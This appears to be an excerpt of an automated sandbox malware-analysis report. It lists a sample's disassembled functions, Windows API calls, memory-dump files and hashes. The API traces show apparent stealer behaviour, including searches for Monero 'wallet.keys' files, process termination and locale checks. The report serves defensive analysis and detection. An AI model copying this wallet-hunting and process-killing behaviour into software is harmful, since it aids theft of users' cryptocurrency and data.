                            Function 00522A71 Relevance: 14.1, Strings: 10, Instructions: 1648COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 6CI $7d_$:2/z$I8$L1}y$V^{$WC__$Y_${{Mk$T)
                            • API String ID: 0-874087593
                            • Opcode ID: a68e1b08d60e6e5caa4d3bd921c27ef75bec43cc971370bb0f4a9a5e86a63f92
                            • Instruction ID: b11e0f4ec28ed9ecd136eb2844e4af7494a9e648b22464e395f6e3010fbd1fdc
                            • Opcode Fuzzy Hash: a68e1b08d60e6e5caa4d3bd921c27ef75bec43cc971370bb0f4a9a5e86a63f92
                            • Instruction Fuzzy Hash: A1B2F8F3A0C2049FE304AE2DEC8567AF7E9EF94720F16493DEAC4C3744E67598058696
                            Function 000DDB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000F15A8,000F0BAF), ref: 000DDBEB
                            • StrCmpCA.SHLWAPI(?,000F15AC), ref: 000DDC33
                            • StrCmpCA.SHLWAPI(?,000F15B0), ref: 000DDC49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000DDECC
                            • FindClose.KERNEL32(000000FF), ref: 000DDEDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 34aadd492f1ac995d2cacb92f0bebeeef8213a156439fd4ec95d2e52adc14703
                            • Instruction ID: 5bf2caa3042e6f3b0c364554e6372dee4f22f55256c3ae724172ebe87e680c90
                            • Opcode Fuzzy Hash: 34aadd492f1ac995d2cacb92f0bebeeef8213a156439fd4ec95d2e52adc14703
                            • Instruction Fuzzy Hash: FC913772B002449FCB14FB75ED969ED737DAF99300F014669F90666142EF34AB48CBA2
                            Function 000E98E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000E9905
                            • Process32First.KERNEL32(000D9FDE,00000128), ref: 000E9919
                            • Process32Next.KERNEL32(000D9FDE,00000128), ref: 000E992E
                            • StrCmpCA.SHLWAPI(?,000D9FDE), ref: 000E9943
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000E995C
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 000E997A
                            • CloseHandle.KERNEL32(00000000), ref: 000E9987
                            • CloseHandle.KERNEL32(000D9FDE), ref: 000E9993
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 2696918072-0
                            • Opcode ID: feebacbaf1f5c1cd099b17cd5431fcde26af675225f0c909b6fd26981673c4ed
                            • Instruction ID: e55c9d4e6a595bcb469411acd5db2729c6654d2c0e603104a1f37fc30b9bef15
                            • Opcode Fuzzy Hash: feebacbaf1f5c1cd099b17cd5431fcde26af675225f0c909b6fd26981673c4ed
                            • Instruction Fuzzy Hash: EC111C75A04208AFCB65DFA5DC88BDDB7BCAB4A700F00458CF509A6240DB749A84CF90
                            Function 000E7D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • GetKeyboardLayoutList.USER32(00000000,00000000,000F05B7), ref: 000E7D71
                            • LocalAlloc.KERNEL32(00000040,?), ref: 000E7D89
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 000E7D9D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 000E7DF2
                            • LocalFree.KERNEL32(00000000), ref: 000E7EB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 06bba5cec1c3548568694fec43c845d8982798ffb7c0ea9c46fbf48bbd103dfc
                            • Instruction ID: 3666616ef739bd1dd5d90877ad7dff66eee6b4f73f4d2e38586123b17ab09ba8
                            • Opcode Fuzzy Hash: 06bba5cec1c3548568694fec43c845d8982798ffb7c0ea9c46fbf48bbd103dfc
                            • Instruction Fuzzy Hash: FD416D71A40258AFCB24DB95DC99BEEB378FB48700F2041D9E10976292DB742F84CFA1
                            Function 0052E6BD Relevance: 10.3, Strings: 7, Instructions: 1580COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $b$M[$~R]$#s$Cv/$Fsw$Y/$
                            • API String ID: 0-1072856351
                            • Opcode ID: ea76dc279ca529597350ee42fde27b7c2069127bc24327f1f0baef1b62d52652
                            • Instruction ID: 27cc61601cd0cc6d731ed543c73c44229de586cdd50cda56477e61d2ed3a711c
                            • Opcode Fuzzy Hash: ea76dc279ca529597350ee42fde27b7c2069127bc24327f1f0baef1b62d52652
                            • Instruction Fuzzy Hash: 1AB2E6F3A0C6009FE304AE29DC8567AFBE5EFD4720F16893DE6C583744EA3598418697
                            Function 000DE530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,000F0D79), ref: 000DE5A2
                            • StrCmpCA.SHLWAPI(?,000F15F0), ref: 000DE5F2
                            • StrCmpCA.SHLWAPI(?,000F15F4), ref: 000DE608
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000DECDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: a60307c2fecf898eb5e3f6e87212512bdcbd0152f2aa9d49051cfe2292d8a64e
                            • Instruction ID: 021e4cecaa5f178efd3a9f129be284a4c0c1bc71a18875d9fee61fdf70a3338b
                            • Opcode Fuzzy Hash: a60307c2fecf898eb5e3f6e87212512bdcbd0152f2aa9d49051cfe2292d8a64e
                            • Instruction Fuzzy Hash: 6D124C32B102589FCB14FB61DCA6AED7379AF59300F4145E9A50A76193EF307B48CB62
                            Function 0052B083 Relevance: 9.1, Strings: 6, Instructions: 1627COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Jbws$VA]$eHH$np[~$:}o$w/
                            • API String ID: 0-747602080
                            • Opcode ID: d6e5ab2183fe39bd2eb5ce497cf33023b9bc69a2b3e8b850acb489dd197875d4
                            • Instruction ID: 10dae7241d24d73260bf13da3b846b8a95028b9e1ecf82bf6678768071397b90
                            • Opcode Fuzzy Hash: d6e5ab2183fe39bd2eb5ce497cf33023b9bc69a2b3e8b850acb489dd197875d4
                            • Instruction Fuzzy Hash: 97B2F5F3A086009FE304AE2DEC8567ABBE9EF94720F1A493DE6C5C7344E63558458793
                            Function 005295AA Relevance: 9.1, Strings: 6, Instructions: 1614COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 93ec$?_{$GUv$Wwe$l:.~$mG{o
                            • API String ID: 0-2175479145
                            • Opcode ID: 9bf8e51648ed2805823eb5d57a81d351ef99365770f25c55e08e0af5b6f0bd59
                            • Instruction ID: 1d1cdad1e3aa48462026cc4c9ca64d5a8709570bf08a54cea2973811abd96cba
                            • Opcode Fuzzy Hash: 9bf8e51648ed2805823eb5d57a81d351ef99365770f25c55e08e0af5b6f0bd59
                            • Instruction Fuzzy Hash: AEB24BF3A0C2049FE304AE2DEC8567AFBE9EF94720F16853DEAC4C7744E93558058696
                            Function 005245B5 Relevance: 9.0, Strings: 6, Instructions: 1541COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: >Y_G$NZ/]$O}{$`26g$f4yy$Hw|
                            • API String ID: 0-3424757978
                            • Opcode ID: 9e5dc95fe84f556b82922c3ba7c2d86d092cab8d9e8a3867a9392db3f359ec1d
                            • Instruction ID: 6779f80ddd5d216ae58f28d6f188219221db26ded1e61a996e4cd36c1c0f49b8
                            • Opcode Fuzzy Hash: 9e5dc95fe84f556b82922c3ba7c2d86d092cab8d9e8a3867a9392db3f359ec1d
                            • Instruction Fuzzy Hash: 91A206F3A082049FE304AE2DEC8567AFBE5EF94720F1A893DE6C4C7744E63558058697
                            Function 000DA210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 000DA23F
                            • LocalAlloc.KERNEL32(00000040,?,?,?,000D4F3E,00000000,?), ref: 000DA251
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 000DA27A
                            • LocalFree.KERNEL32(?,?,?,?,000D4F3E,00000000,?), ref: 000DA28F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: >O
                            • API String ID: 4291131564-3638836991
                            • Opcode ID: 7cd74d85232c7b2500703f4be33deca1c3f16a7e3c140e2ebf7431b94e17e406
                            • Instruction ID: df45c855a789dbb11d13a4bf196981126b15671621c046414741ac8fc5bd69ad
                            • Opcode Fuzzy Hash: 7cd74d85232c7b2500703f4be33deca1c3f16a7e3c140e2ebf7431b94e17e406
                            • Instruction Fuzzy Hash: C511A474240308AFEB11CF64CC95FAA77B9EB89B10F208459FD159B390C7B2A941CB90
                            Function 0052CB19 Relevance: 7.9, Strings: 5, Instructions: 1637COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
